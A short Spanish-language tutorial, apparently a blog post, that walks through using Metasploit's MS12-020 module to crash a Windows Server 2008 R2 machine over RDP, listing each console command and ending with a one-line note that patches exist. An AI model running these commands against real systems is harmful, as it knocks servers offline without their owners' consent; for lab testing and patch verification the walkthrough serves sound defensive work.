Recientemente ha aparecido una vulnerabilidad que afecta a Windows y su implementación del protocolo RDP (Remote Desktop Protocol)
Como era previsible ya hay múltiples noticias con el exploit, pastebins…etc para explotar esta vulnerabilidad y como no podría faltar metasploit ya tiene incluido dicho exploit.
Lo primero tenemos que actualizar metasploit:
msfupdate
Una vez actualizamos. accedemos y cargamos el modulo.
Arrancamos:
msfconsole
Cargamos el modulo
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Si queremos ver la información del modulo
como podemos nos 2 dos opciones, la dirección y el puerto destino. Lo añadimos:
set RHOST 192.168.1.198
y solo alta ejecutar el exploit.
run
Si observamos el sistema operativo el cual hemos realizado el ataque (En este caso Windows Server 2008 R2 ) vemos que se a reiniciado.
*NOTAS:
Decir que ya se encuentran todos los parches para solventar esta vulnerabilidad y es conveniente actualizar lo antes posible.
Mas información: